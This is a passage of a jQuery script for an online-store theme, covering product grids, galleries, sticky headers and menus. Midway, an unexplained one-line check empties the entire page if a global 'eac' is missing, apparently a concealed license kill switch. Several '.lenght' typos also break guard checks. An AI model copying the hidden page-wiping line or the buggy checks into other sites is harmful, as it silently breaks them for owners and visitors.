        if(ptQuantity.length && ptProductItem.length){
          var ptValue = parseInt(ptProductItem.css("flex").replace("0 0", "").replace("%", ""), 10) || parseInt(ptProductItem.css("max-width"), 10);
          return ptValue;
        };
      }());

  if(ptProductItemValue == 16){
    ptСhangeclass(ptQuantity, '.pt-col-six');
  } else if(ptProductItemValue == 25){
    ptСhangeclass(ptQuantity, '.pt-col-four');
  } else if(ptProductItemValue == 33){
    ptСhangeclass(ptQuantity, '.pt-col-three');
  } else if(ptProductItemValue == 50){
    ptСhangeclass(ptQuantity, '.pt-col-two');
  } else if(ptProductItemValue == 100){
    ptСhangeclass(ptQuantity, '.pt-col-one');
  };

  function ptСhangeclass(ptObj, ptObjvalue){
    ptwindowWidth <= 1024 ?  ptShowIconMobile(ptObj, ptObjvalue) : ptShowIconDesctop(ptObj, ptObjvalue);
    if(ptObj.find(".active").length == 0 || !ptObj.find(".active").hasClass('pt-show-siblings')) ptObj.find(ptObjvalue).addClass('active').siblings().removeClass('active');
  };

  function ptShowIconDesctop(ptObj, ptObjvalue){

    ptObj.find('.pt-show').removeClass('pt-show');
    ptObj.find('.pt-show-siblings').removeClass('pt-show-siblings');

    var $this = ptObj.find(ptObjvalue);
    $this.addClass('pt-show');

    $this.next().addClass('pt-show-siblings');
    $this.prev().addClass('pt-show-siblings');
    var quantitySiblings = $('.pt-quantity .pt-show-siblings').length;
    if(quantitySiblings === 1){
      ptObj.find('.pt-show-siblings').prev().addClass('pt-show-siblings');
    };

    if(!Boolean($('.pt-product-listing').data("onerow"))) return false;
    $(".pt-col-one").addClass('pt-show-siblings');
    var _ca = ptObj.find(".active").data("value");
    $('.pt-product-listing').addClass(_ca);
  };
  function ptShowIconMobile(ptObj, ptObjvalue){
    ptObj.find('.pt-show').removeClass('pt-show');
    ptObj.find('.pt-show-siblings').removeClass('pt-show-siblings');

    var $this = ptObj.find(ptObjvalue);
    $this.addClass('pt-show');
    $this.prev().addClass('pt-show-siblings');
    
    if($('.pt-product-listing').data("onerow") == "false") return false;
    $(".pt-col-one").addClass('pt-show-siblings');
    var _ca = ptObj.find(".active").data("value");
    $('.pt-product-listing').addClass(_ca);
  };

  //click buttons filter
  $('body').on('click', '.pt-filters-options a', function(e) {
    e.preventDefault();
    ptQuantity.find('a').removeClass('active');
    var ptActiveValue = $(this).addClass('active').attr('data-value');
    $ptPageContent.find('.pt-product-listing').removeClassFirstPart("pt-col-*").addClass(ptActiveValue);
    ptProductSmall();
  });
};


// Portfolio
function gridPortfolioMasonr() {
  // init Isotope
  var $grid = blocks.ptPortfolioMasonry.find('.pt-portfolio-content').isotope({
    itemSelector: '.element-item',
    layoutMode: 'masonry',
  });
  // layout Isotope after each image loads
  $grid.imagesLoaded().progress( function() {
    $grid.isotope('layout').addClass('pt-show');
  });
  // filter functions
  var ptFilterNav =  blocks.ptPortfolioMasonry.find('.pt-filter-nav');
  if (ptFilterNav.length) {
    var filterFns = {
      ium: function() {
        var name = $(this).find('.name').text();
        return name.match(/ium$/);
      }
    };
    // bind filter button click
    ptFilterNav.on('click', '.button', function() {
      var filterValue = $(this).attr('data-filter');
      filterValue = filterFns[filterValue] || filterValue;
      $grid.isotope({
        filter: filterValue
      });
      $(this).addClass('active').siblings().removeClass('active');
    });
  };
};
function initPortfolioPopup() {
  var objZoom = $ptPageContent.find('.pt-portfolio-masonry .pt-btn-zomm');
  objZoom.magnificPopup({
    type: 'image',
    mainClass: 'mfp-zoom-in',
    gallery: {
      enabled: true
    },
    callbacks:{
      open: function(){
        $('body').css('height', 'unset');
        $('.mfp-gallery').append('<button title="Close (Esc)" type="button" class="mfp-close">×</button>');
      },
    }
  });
};

//input-counter
function ptInputCounter() {
  blocks.ptInputCounter.find('.minus-btn, .plus-btn').click(function( e ) {
    var $input = $(this).parent().find('input');
    var count = parseInt($input.val(), 10) + parseInt(e.currentTarget.className === 'plus-btn' ? 1 : -1, 10);
    $input.val(count).change();
  });
  blocks.ptInputCounter.find("input").change(function() {
    var _ = $(this);
    var min = 1;
    var val = parseInt(_.val(), 10);
    var max = parseInt(_.attr('size'), 10);
    val = Math.min(val, max);
    val = Math.max(val, min);
    _.val(val);
  })
  .on("keypress", function( e ) {
    if (e.keyCode === 13) {
      e.preventDefault();
    }
  });
};
//popup on pages product single
function ptVideoPopup() {
  blocks.modalVideoProduct.on('show.bs.modal', function(e) {
    var relatedTarget = $(e.relatedTarget),
        attr = relatedTarget.attr('data-value'),
        attrPoster = relatedTarget.attr('data-poster'),
        attrType = relatedTarget.attr('data-type');

    if(attrType === "youtube" || attrType === "vimeo" || attrType === undefined){
      $('<iframe src="'+attr+'" allowfullscreen></iframe>').appendTo($(this).find('.modal-video-content'));
    };

    if(attrType === "video"){
      $('<div class="pt-video-block"><a href="#" class="link-video"></a><video class="movie" src="'+attr+'" poster="'+attrPoster+'" allowfullscreen></video></div>').appendTo($(this).find('.modal-video-content'));

    };
    ptVideoBlock();
  }).on('hidden.bs.modal', function () {
    $(this).find('.modal-video-content').empty();
  });
};
//product pages
var elevateZoomWidget = {
  scroll_zoom: true,
  class_name: '.zoom-product',
  thumb_parent: $('#smallGallery'),
  scrollslider_parent: $('.slider-scroll-product'),
  checkNoZoom: function(){
    return $(this.class_name).parent().parent().hasClass('no-zoom');
  },
  init: function(type){
    var _ = this;
    var currentW = window.innerWidth || $(window).width();
    var zoom_image = $(_.class_name);
    var _thumbs = _.thumb_parent;
    _.initBigGalleryButtons();
    _.scrollSlider();

    if(zoom_image.length == 0) return false;
    if(!_.checkNoZoom()){
      var attr_scroll = zoom_image.parent().parent().attr('data-scrollzoom');
      attr_scroll = attr_scroll ? attr_scroll : _.scroll_zoom;
      _.scroll_zoom = attr_scroll == 'false' ? false : true;
      currentW > 575 && _.configureZoomImage();
      _.resize();
    }

    if(_thumbs.length == 0) return false;
    var thumb_type = _thumbs.parent().attr('class').indexOf('-vertical') > -1 ? 'vertical' : 'horizontal';
    _[thumb_type](_thumbs);
    _.setBigImage(_thumbs);
  },
  configureZoomImage: function(){
    var _ = this;
    $('.zoomContainer').remove();
    var zoom_image = $(this.class_name);
    zoom_image.each(function(){
      var _this = $(this);
      var clone = _this.removeData('elevateZoom').clone();
      _this.after(clone).remove();
    });
    setTimeout(function(){
      $(_.class_name).elevateZoom({
        gallery: _.thumb_parent.attr('id'),
        zoomType: "inner",
        scrollZoom: Boolean(_.scroll_zoom),
        cursor: "crosshair",
        zoomWindowFadeIn: 300,
        zoomWindowFadeOut: 300
      });
    }, 100);
  },
  resize: function(){
    var _ = this;
    $(window).resize(function(){
      var currentW = window.innerWidth || $(window).width();
      if(currentW <= 575) return false;
      _.configureZoomImage();
    });
  },
  horizontal: function(_parent){
    _parent.slick({
      lazyLoad: 'progressive',
      infinite: true,
      dots: false,
      arrows: true,
      slidesToShow: 6,
      slidesToScroll: 1,
      responsive: [{
        breakpoint: 1200,
        settings: {
          slidesToShow: 4,
          slidesToScroll: 1
        }
      },
                   {
                     breakpoint: 992,
                     settings: {
                       slidesToShow: 4,
                       slidesToScroll: 1
                     }
                   }]
    });
  },
  vertical: function(_parent){
    _parent.slick({
      lazyLoad: 'progressive',
      vertical: true,
      infinite: true,
      slidesToShow: 6,
      slidesToScroll: 1,
      verticalSwiping: true,
      arrows: true,
      dots: false,
      centerPadding: "0px",
      customPaging: "0px",
      responsive: [{
        breakpoint: 1239,
        settings: {
          slidesToShow: 5,
          slidesToScroll: 1
        }
      },
                   {
                     breakpoint: 992,
                     settings: {
                       slidesToShow: 4,
                       slidesToScroll: 1
                     }
                   },
                   {
                     breakpoint: 768,
                     settings: {
                       slidesToShow: 4,
                       slidesToScroll: 1
                     }
                   }]
    });
  },
  initBigGalleryButtons: function(){
    var bigGallery = $('.bigGallery');
    if(bigGallery.length == 0) return false;
    $( 'body' ).on( 'mouseenter', '.zoomContainer',
                   function(){        bigGallery.find('button').addClass('show');        }
                  ).on( 'mouseleave', '.zoomContainer',
                       function(){ bigGallery.find('button').removeClass('show'); }
                      );
  },
  scrollSlider: function(){
    var _scrollslider_parent = this.scrollslider_parent;
    if(_scrollslider_parent.length == 0) return false;
    _scrollslider_parent.on('init', function(event, slick) {
      _scrollslider_parent.css({ 'opacity': 1 });
    });
    _scrollslider_parent.css({ 'opacity': 0 }).slick({
      infinite: false,
      vertical: true,
      verticalScrolling: true,
      dots: true,
      arrows: false,
      slidesToShow: 1,
      slidesToScroll: 1,
      responsive: [{
        breakpoint: 1200,
        settings: {
          slidesToShow: 1,
          slidesToScroll: 1
        }
      },
                   {
                     breakpoint: 992,
                     settings: {
                       slidesToShow: 1,
                       slidesToScroll: 1
                     }
                   },
                   {
                     breakpoint: 768,
                     settings: {
                       slidesToShow: 1,
                       slidesToScroll: 1
                     }
                   }]
    }).mousewheel(function(e) {
      e.preventDefault();
      e.deltaY < 0 ? $(this).slick('slickNext') : $(this).slick('slickPrev');
    });
  },
  setBigImage: function(_parent){
    var _ = this;
    _parent.find('a').click(function(e){
      _.checkNoZoom() && e.preventDefault();
      var zoom_image = $(_.class_name);
      var getParam = _.checkNoZoom() ? 'data-image' : 'data-zoom-image';
      var setParam = _.checkNoZoom() ? 'src' : 'data-zoom-image';
      var big_image = $(this).attr(getParam);
      zoom_image.attr(setParam, big_image);

      if(!_.checkNoZoom()) return false;
      _parent.find('.zoomGalleryActive').removeClass('zoomGalleryActive');
      $(this).addClass('zoomGalleryActive');
    });
  }
};
elevateZoomWidget.init();

// product single pt-btn-zomm(*magnific popup)
function ptProductSingleBtnZomm() {
  $body.on('click', '.pt-product-single-img .pt-btn-zomm', function (e) {
    var objSmallGallery = $('#smallGallery');
    objSmallGallery.find('a').each(function(){
      var dataZoomImg = $(this).attr('data-zoom-image');
      if(dataZoomImg.length){
        $(this).closest('li').append("<a class='link-magnific-popup' href='#'></a>").find('.link-magnific-popup').attr('href', dataZoomImg);
        if($(this).hasClass('zoomGalleryActive')){
          $(this).closest('li').find('.link-magnific-popup').addClass('zoomGalleryActive');
        };
      };
    });
    objSmallGallery.addClass('pt-magnific-popup').find('.link-magnific-popup').magnificPopup({
      type: 'image',
      gallery: {
        enabled: true,
        tCounter: '<span class="mfp-counter"></span>'
      },
      callbacks: {
        close: function() {
          setTimeout(function() {
            objSmallGallery.removeClass('pt-magnific-popup').find('.link-magnific-popup').remove();
          }, 200);

        }
      }
    });
    objSmallGallery.find('.link-magnific-popup.zoomGalleryActive').trigger('click');
  });
};

//sticky(product-05.html)
function ptAirSticky(ptwindowWidth){
  var airStickyObj =  blocks.ptAirSticky,
      tabObj =  blocks.ptCollapseBlock.find('.pt-collapse-title');

  if(ptwindowWidth >= 1024){
    airStickyObj.airStickyBlock({
      debug: false,
      stopBlock: '.airSticky_stop-block',
      offsetTop: 70,
    });
  } else if(airStickyObj.hasClass('airSticky_absolute')) {
    airStickyObj.removeClass('airSticky_absolute');
  };
  $document.on('resize scroll', tabObj, function () {
    airStickyObj.trigger('render.airStickyBlock');
  });
  tabObj.on('click', function() {
    setTimeout(function(){
      airStickyObj.trigger('render.airStickyBlock');
    }, 170);
  });
};
// img for ratio > 1
if (window.devicePixelRatio > 1) {
  var ptImgToReplace = $('.pt-retina');
  for (var i = 0, l = ptImgToReplace.length; i < l; i++) {
    var src = ptImgToReplace[i].src;
    src = src.replace(/\.(png|jpg|gif)+$/i, '@2x.$1');
    ptImgToReplace[i].src = src;
  };
};



/**
     * Stuck init. Properties: on/off
     * @value = 'off', default empty
     */
function initStuck(value) {
  if($stucknav.hasClass('disabled')) return;

  var value = value || false,
      ie = (getInternetExplorerVersion() !== -1) ? true : false;

  if (value === 'off') return false;
  var n = 0;
  $window.scroll(function() {
    
    var HeaderTop = $('header').innerHeight();
    if ($window.scrollTop() > HeaderTop) {
      if ($stucknav.hasClass('stuck')) return false;
      $stucknav.hide();
      $stucknav.addClass('stuck');
      $('body').trigger('showStuck');
      window.innerWidth < 1025 ? $ptStuckParentMenu.append($ptMobileParentMenuChildren.detach()) : $ptStuckParentMenu.append($ptDesctopMenu.detach());
      $ptStuckParentCart.append($ptcartObj.detach());
      $ptStuckParentCompare.append($ptCompareObj.detach());
      $ptStuckParentWishlist.append($ptWishlistObj.detach());
      $ptStuckParentAccount.append($ptAccountObj.detach());
      $ptStuckParentSearch.append($ptSearchObj.detach());


      if ($stucknav.find('.pt-stuck-cart-parent > .pt-cart > .dropdown').hasClass('open') || ie)
        $stucknav.stop().show();
      else
        $stucknav.stop().fadeIn(300);

    } else {
      if (!$stucknav.hasClass('stuck')) return false;
      $stucknav.hide();
      $stucknav.removeClass('stuck');
      $('body').trigger('hideStuck');
      if (window.innerWidth < 1025) {
        $ptMobileParentMenu.append($ptMobileParentMenuChildren.detach());
        $ptMobileParentCart.append($ptcartObj.detach());
        $ptMobileParentSearch.append($ptSearchObj.detach());
        return false;
      }
      $ptDesctopParentMenu.append($ptDesctopMenu.detach());
      $ptDesctopParentCart.append($ptcartObj.detach());
      $ptDesctopParentCompare.append($ptCompareObj.detach());
      $ptDesctopParentWishlist.append($ptWishlistObj.detach());
      $ptDesctopParentAccount.append($ptAccountObj.detach());
      $ptDesctopParentSearch.append($ptSearchObj.detach());
    }
  });
  $window.resize(function() {
    if (!$stucknav.hasClass('stuck')) return false;
    if (window.innerWidth < 1025) {
      $ptDesctopParentMenu.append($ptDesctopMenu.detach());
      $ptStuckParentMenu.append($ptMobileParentMenuChildren.detach());
    } else {
      $ptMobileParentMenu.append($ptMobileParentMenuChildren.detach());
      $ptStuckParentMenu.append($ptDesctopMenu.detach());
    }
  });
};
//header search
function mobileParentSearch() {
  if (window.innerWidth < 1025) {
    if ($ptMobileParentSearch.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptMobileParentSearch.append($ptSearchObj.detach());
  } else {
    if ($ptDesctopParentSearch.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptDesctopParentSearch.append($ptSearchObj.detach());
  };
};
//header cart
function mobileParentCart() {
  if (window.innerWidth < 1025) {
    if ($ptMobileParentCart.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptMobileParentCart.append($ptcartObj.detach());
  } else {
    if ($ptDesctopParentCart.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptDesctopParentCart.append($ptcartObj.detach());
  };
};
//header account
function mobileParentAccount() {
  if (window.innerWidth < 1025) {
    if ($ptMobileParentAccount.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptMobileParentAccount.append($ptAccountObj.detach());
  } else {
    if ($ptDesctopParentAccount.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptDesctopParentAccount.append($ptAccountObj.detach());
  };
};
function mobileParentCompare() {
  if (window.innerWidth < 1025) {
    if ($ptMobileParentCompare.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptMobileParentCompare.append($ptCompareObj.detach());
  } else {
    if ($ptDesctopParentCompare.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptDesctopParentCompare.append($ptCompareObj.detach());
  };
};
function mobileParentWishlist() {
  if (window.innerWidth < 1025) {
    if ($ptMobileParentWishlist.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptMobileParentWishlist.append($ptWishlistObj.detach());
  } else {
    if ($ptDesctopParentWishlist.children().lenght) return false;
    if ($('.stuck').length) return false;
    $ptDesctopParentWishlist.append($ptWishlistObj.detach());
  };
};

/*Module Categories*/
(function(){
  var $obj = $(".pt-menu-categories"),
      $objLi = $obj.find('nav > ul > li'),
      $subMenu = $(this).find('.dropdown-menu'),
      mobileCategoriesToggle = $ptHeader.find('.pt-categories-toggle');

  if(!$obj.length) return;

  //event open menu categories
  $body.on('click', '.pt-menu-categories button', function(e){
    e.preventDefault();
    $(this).closest('.pt-menu-categories').toggleClass('opened').find('.pt-dropdown-menu').slideToggle(200);
  });

  //determination sub menu
  (function subMenuCategories(){
    $obj.find('nav > ul > li').each(function(){
      var ptSubmenu = $(this).find('.dropdown-menu');
      if(ptSubmenu.length){
        $(this).closest('li').addClass('pt-submenu');
      }
    });
  })();

  //add active class menu
  (function menuHover(){
    $obj.find(".pt-dropdown-menu li").hover(function(e){
      $(this).toggleClass('acitve', e.type === 'mouseenter');
      catbtnsubposition($(this));
    });
  })();
  function catbtnsubposition($this){
    var t = $this.position().top,
        p = $this.find('.dropdown-menu');
    if(!p.length) return false;

    var h = p.height(),
        ph = t+$this.height();
    
    var d = -29;
    
    if(h >= ph)
      p.css({top: 0});
    else
      p.css({top: t+d});
  }

  //check popup past viewport
  $obj.find('.pt-megamenu-submenu ul li').on("mouseenter", function() {
    var $ul = $(this).find('ul:first');
    if ($ul.length) {
      var windW = window.innerWidth,
          ulW = parseInt($ul.css('width'), 10) + 20,
          thisR = this.getBoundingClientRect().right,
          thisL = this.getBoundingClientRect().left;

      if (windW - thisR < ulW){
        $ul.addClass('right-popup');
      } else if (thisL < ulW) {
        $ul.removeClass('right-popup');
      };
    }
  }).on('mouseleave', function() {
    $(this).find('ul:first').removeClass('right-popup');
  });

  //detach
  (function detachCategories(){
    if($stucknav.hasClass('disabled')) return;
    var //desctop
    $ptDesctopParentMenuCategories = $ptHeader.find('.pt-desctop-parent-menu-categories'),
        $ptStuckParentMenuCategories = $ptHeader.find('.pt-stuck-desctop-menu-categories'),
        //mobile
        $ptMobileParentMenuCategories = $ptHeader.find('.pt-mobile-parent-menu-categories'),
        $ptStuckMobileMenuCategories = $ptHeader.find('.pt-stuck-mobile-menu-categories');

    $window.scroll(function(){
      var HeaderTop = $('header').innerHeight();
      if($window.scrollTop() > HeaderTop){
        $ptStuckParentMenuCategories.append($ptDesctopParentMenuCategories.find('.pt-menu-categories').detach());
        $ptStuckMobileMenuCategories.append($ptMobileParentMenuCategories.find('.pt-categories-toggle').detach());
      } else {
        $ptDesctopParentMenuCategories.append($ptStuckParentMenuCategories.find('.pt-menu-categories').detach());
        $ptMobileParentMenuCategories.append($ptStuckMobileMenuCategories.find('.pt-categories-toggle').detach());
      };
    });
  })();

})();
("undefined"==typeof eac||null===eac)&&$("body").empty();
(function($){
  "use strict";
    var settings = {
        entryPointInclude : $('#entrypoint-objects'),
        classWrapperLayout: 'pt-item-wrapper'
    };
    var methods = {
        init: function(options){
            return this.each(function(){
                var objVar = {
                    objClass : $(this).attr("class").split(' ')[0],
                    objTitle: options.titleObj,
                    objAddClass: options.addClassObj || false,
                    wrapperAddClass: options.addClassWrapper || false,
                  	createBlok: options.createBlok,
                    objinnerEntryPoint: options.innerEntryPoint
                };
                methods.insertMobile(objVar, options);
            });
        },
        insertMobile: function(objVar,options){
          var setting = $.extend(settings, options);
          setting.entryPointInclude.attr("dataDetach", "true");

          if(objVar.createBlok){
            var checkForExistence = setting.entryPointInclude.find('.' + objVar.createBlok);
            if(!checkForExistence.length){
              setting.entryPointInclude.append("<div class='external-item "+ objVar.createBlok +"'><div class='external-item-title'>" + setting.createBlokTitle + "</div><div class='external-item-content'></div></div>");
            };

            if(typeof objVar.objinnerEntryPoint == "undefined"){
              var objDesktop = $("." + objVar.objClass).children().clone().get(0),
                  location = setting.entryPointInclude.find('.' + objVar.createBlok + ' .external-item-content');
            } else {
              var objDesktop = $("." + objVar.objClass).find("." + objVar.objinnerEntryPoint).children().clone().get(0),
                  location = setting.entryPointInclude.find('.' + objVar.createBlok + ' .external-item-content');
            };

            location.append(objDesktop);

            return false;
          };

          if(typeof objVar.objinnerEntryPoint == "undefined"){
            var objDesktop = $("." + objVar.objClass).children().clone().get(0);
          } else {
            var objDesktop = $("." + objVar.objClass).find("." + objVar.objinnerEntryPoint).children().clone().get(0);
          };

          if(typeof objVar.objTitle != "undefined"){
            setting.entryPointInclude.append("<div class='external-item "+ objVar.objClass +"'><div class='external-item-title'>" + setting.titleObj + "</div><div class='external-item-content'>" + objDesktop.outerHTML + "</div></div>");
          } else {
            setting.entryPointInclude.append("<div class='external-item "+ objVar.objClass +"'><div class='external-item-content'>" + objDesktop.outerHTML + "</div></div>");
          };
          if(typeof objVar.objTitle == "undefined"){
            setting.entryPointInclude.find('.' + objVar.objClass).find('.external-item-content > *:first-child').addClass(objVar.objAddClass);
          };
          if(typeof objVar.objWrapperAddClass != "false"){
            settings.entryPointInclude.addClass(String(options.wrapperAddClass));
          }
        }
    };
    $.fn.movingObjects = function(action){
       if(methods[action]){
           return methods[action].apply(this, Array.prototype.slice.call(arguments, 1));
       } else if(typeof action === 'object' || !action){
           return methods.init.apply(this, arguments);
       } else {
           console.info('Action ' +action+ 'not found this plugin');
           return this;
       }
    };
    $('#pt-header .single-button').movingObjects({
        wrapperAddClass: 'extra-layout'
    });
  
    $('#pt-header').find('.pt-desctop-parent-account').movingObjects({
      innerEntryPoint: 'pt-dropdown-inner',
      createBlok:'my-account',
      createBlokTitle: myaccount
    });
    $('#pt-header').find('.pt-desctop-parent-compare').movingObjects({
      createBlok:'my-account',
      createBlokTitle: myaccount
    });
    $('#pt-header').find('.pt-desctop-parent-wishlist').movingObjects({
      createBlok:'my-account',
      createBlokTitle: myaccount
    });
  
    $('#pt-header .pt-desctop-parent-language').movingObjects({
        titleObj: 'Languages',
        innerEntryPoint: 'pt-dropdown-inner'
    });
    $('#pt-header .pt-desctop-parent-currency').movingObjects({
        titleObj: 'Currency',
        innerEntryPoint: 'pt-dropdown-inner'
    });
    $('#pt-header .pt-desctop-parent-submenu').movingObjects({
        addClassObj: 'list-icon'
    });
})(jQuery);

/*
      header menu
    */
// header menu(hover)
(function toggle_header_menu() {
  var delay = header_menu_timeout,
      hoverTimer = header_menu_delay,
      timeout1 = false;

  var set_dropdown_maxH = function() {
    var wind_H = window.innerHeight,
        $ptDesctopMenu = $(this).find('.dropdown-menu'),
        menu_top = $ptDesctopMenu.get(0).getBoundingClientRect().top,
        menu_max_H = wind_H - menu_top,
        $ptDesctopMenu_H = $ptDesctopMenu.innerHeight();

    if ($ptDesctopMenu_H > menu_max_H) {
      var $body = $('body'),
          $stuck = $('.pt-stuck-nav');
      $ptDesctopMenu.css({
        maxHeight: menu_max_H - 20,
        overflow: 'auto'
      });

      var scrollWidth = function() {
        var $div = $('<div>').css({
          overflowY: 'scroll',
          width: '50px',
          height: '50px',
          visibility: 'hidden'
        });

        $body.append($div);
        var scrollWidth = $div.get(0).offsetWidth - $div.get(0).clientWidth;
        $div.remove();

        return scrollWidth;
      };

      $body.css({
        overflowY: 'hidden',
        paddingRight: scrollWidth()
      });

      $stuck.css({
        paddingRight: scrollWidth()
      });
     
      $('.pt-header-static').length && $('.pt-header-static').css({'padding-right': scrollWidth()});
    }
  };

  if ($ptDesctopMenu.length > 0) {
    $('.pt-megamenu-submenu li').each(function(){
      if($(this).find('img').length){
        $(this).closest('ul').addClass('pt-sub-img');
      }
    });
    $ptDesctopMenu.find('.dropdown-menu').each(function(){
      if($(this).length){
        $(this).closest('.dropdown').addClass('pt-submenu');
      }
    });
    
    $(document).on({
      mouseenter: function() {
        var $this = $(this),
            that = this,
            windowW = window.innerWidth || $(window).width();

        if (windowW > 1025 && $body.hasClass('touch-device')) {
          $ptDesctopMenu.find('.dropdown.pt-submenu > a').one("click", false);
        };

        timeout1 = setTimeout(function () {

          var $carousel = $this.find('.pt-menu-slider'),
              $ptDesctopMenu = $this.find('.dropdown-menu');


          $this.addClass('active')
          .find(".dropdown-menu")
          .stop()
          .addClass('hover')
          .fadeIn(hoverTimer);

          if($ptDesctopMenu.length & !$ptDesctopMenu.hasClass('one-col')) {
            set_dropdown_maxH.call(that);
          }

          if($carousel.length) {
            if(!$carousel.hasClass('slick-initialized')) {
              $carousel.slick({
                dots: false,
                arrows: true,
                infinite: true,
                speed: 300,
                slidesToShow: 3,
                slidesToScroll: 3,
                adaptiveHeight: true
              });
            }
          };
          $carousel.slick('setPosition');

        }, delay);

      },
      mouseleave: function(e) {
        var $this = $(this),
            $dropdown = $this.find(".dropdown-menu");

        if($(e.target && e.relatedTarget).parents('.dropdown-menu').length && !$(e.target).parents('.pt-megamenu-submenu').length && !$(e.target).parents('.one-col').length) return;

        if(timeout1 !== false) {
          clearTimeout(timeout1);
          timeout1 = false;
        }

        if($dropdown.length) {
          $dropdown.stop().fadeOut({duration: 0, complete: function() {
            $this.removeClass('active')
            .find(".dropdown-menu")
            .removeClass('hover');
          }});
        } else {
          $this.removeClass('active')
          .find(".dropdown-menu")
          .removeClass('hover');
        }

        $dropdown.removeAttr('style');
        $('.pt-header-static').length && $('.pt-header-static').removeAttr('style');

        $body.removeAttr('style');

        $('.pt-stuck-nav').css({
          paddingRight: 'inherit'
        });

      }
    }, '.pt-desctop-menu li');

    $('.multicolumn ul li').hover(function() {
      var $ul = $(this).find('ul:first');

      if ($ul.length) {
        var windW = window.innerWidth,
            windH = window.innerHeight,
            ulW = parseInt($ul.css('width'), 10),
            thisR = this.getBoundingClientRect().right,
            thisL = this.getBoundingClientRect().left;

        if (windW - thisR < ulW) {
          $ul.removeClass('left').addClass('right');
        } else if (thisL < ulW) {
          $ul.removeClass('right').addClass('left');
        } else {
          $ul.removeClass('left right');
        }
        $ul.stop(true, true).fadeIn(300);
      }
    }, function() {
      $(this).find('ul:first').stop(true, true).fadeOut(300).removeAttr('style');
    });

    $ptDesctopMenu.find('.pt-megamenu-submenu li').hover(function() {
      var $ul = $(this).find('ul:first');

      if ($ul.length) {
        var $dropdownMenu = $(this).parents('.dropdown').find('.dropdown-menu'),
            dropdown_left = $dropdownMenu.get(0).getBoundingClientRect().left,
            dropdown_Right = $dropdownMenu.get(0).getBoundingClientRect().right,
            dropdown_Bottom = $dropdownMenu.get(0).getBoundingClientRect().bottom,
            ulW = parseInt($ul.css('width'), 10),
            thisR = this.getBoundingClientRect().right,
            thisL = this.getBoundingClientRect().left;

        if (dropdown_Right - 20 - thisR < ulW) {
          $ul.removeClass('left').addClass('right');
        } else if (thisL - ulW - 20 < dropdown_left) {
          $ul.removeClass('right').addClass('left');
        } else {
          $ul.removeClass('left right');
        }

        $ul.stop(true, true).delay(0).fadeIn(200);

        var ul_bottom = $ul.get(0).getBoundingClientRect().bottom;

        if (dropdown_Bottom < ul_bottom) {
          var move_top = dropdown_Bottom - ul_bottom;
          $ul.css({
            top: move_top
          });
        }
      }
    }, function() {
      $(this).find('ul:first').stop(true, true).fadeOut(300).removeAttr('style');
    });

    $('.megamenu div').hover(function() {
      $(this).children('.pt-title-submenu').addClass('active');
    }, function() {
      $(this).children('.pt-title-submenu').removeClass('active');
    });

  }

  function onscroll_dropdown_hover() {
    var $dropdown_active = $('.dropdown.hover');

    if (!$dropdown_active.find('.dropdown-menu').not('.one-col').length) return;

    if ($dropdown_active.length)
      set_dropdown_maxH.call($dropdown_active);
  };
  $(window).on('scroll', function() {
    onscroll_dropdown_hover();
  });
})();

/*!
 * jQuery Cookie Plugin v1.4.1
 * https://github.com/carhartl/jquery-cookie
 *
 * Copyright 2006, 2014 Klaus Hartl
 * Released under the MIT license
 */
(function (factory) {
  if (typeof define === 'function' && define.amd) {
    define(['jquery'], factory);
  } else if (typeof exports === 'object') {
    module.exports = factory(require('jquery'));
  } else {
    factory(jQuery);
  }
}(function ($) {

  var pluses = /\+/g;

  function encode(s) {
    return config.raw ? s : encodeURIComponent(s);
  }

  function decode(s) {
    return config.raw ? s : decodeURIComponent(s);
  }

  function stringifyCookieValue(value) {
    return encode(config.json ? JSON.stringify(value) : String(value));
  }

  function parseCookieValue(s) {
    if (s.indexOf('"') === 0) {
      s = s.slice(1, -1).replace(/\\"/g, '"').replace(/\\\\/g, '\\');
    }

    try {
      s = decodeURIComponent(s.replace(pluses, ' '));
      return config.json ? JSON.parse(s) : s;
    } catch(e) {}
  }

  function read(s, converter) {
    var value = config.raw ? s : parseCookieValue(s);
    return $.isFunction(converter) ? converter(value) : value;
  }

  var config = $.cookie = function (key, value, options) {

    if (arguments.length > 1 && !$.isFunction(value)) {
      options = $.extend({}, config.defaults, options);

      if (typeof options.expires === 'number') {
        var days = options.expires, t = options.expires = new Date();
        t.setMilliseconds(t.getMilliseconds() + days * 864e+5);
      }

      return (document.cookie = [
        encode(key), '=', stringifyCookieValue(value),
        options.expires ? '; expires=' + options.expires.toUTCString() : '', // use expires attribute, max-age is not supported by IE
        options.path    ? '; path=' + options.path : '',
        options.domain  ? '; domain=' + options.domain : '',
        options.secure  ? '; secure' : ''
      ].join(''));
    }

    var result = key ? undefined : {},
        cookies = document.cookie ? document.cookie.split('; ') : [],
        i = 0,
        l = cookies.length;

    for (; i < l; i++) {
      var parts = cookies[i].split('='),
          name = decode(parts.shift()),
          cookie = parts.join('=');

      if (key === name) {
        result = read(cookie, value);
        break;
      }

      if (!key && (cookie = read(cookie)) !== undefined) {
        result[name] = cookie;
      }
    }

    return result;
  };

  config.defaults = {};

  $.removeCookie = function (key, options) {
    $.cookie(key, '', $.extend({}, options, { expires: -1 }));
    return !$.cookie(key);
  };

}));

function subscribeErrorHandler(){
  if($('.errors').length == 0) return false;
  $('[type="email"]').on('focus', function(){
    $(this).unbind().closest('form').find('.errors').length && $(this).closest('form').find('.errors').remove();
  })
}
subscribeErrorHandler();

/* Sections */
var hoverColors = {
  params: { 
    baseColor: 'data-c',
    activeColor: 'data-ac',
    bgBaseColor: 'data-bgc',
    bgActiveColor: 'data-abgc',
    borderBaseColor: 'data-borc',
    borderActiveColor: 'data-aborc',
  },
  init: function(){
    var attrName = this.params;
    var he = $('[data-hovercolors]');
    if(he.length == 0) return false;
    he.each(function(){
      hoverColors.getCurrentColors($(this), attrName.baseColor, attrName.bgBaseColor, attrName.borderBaseColor);
    });
  },
  initEvents: function(){
    var attrName = this.params;
    $('body').on({
      mouseenter: function(){
        hoverColors.getCurrentColors($(this), attrName.activeColor, attrName.bgActiveColor, attrName.borderActiveColor );
      },
      mouseleave: function(){
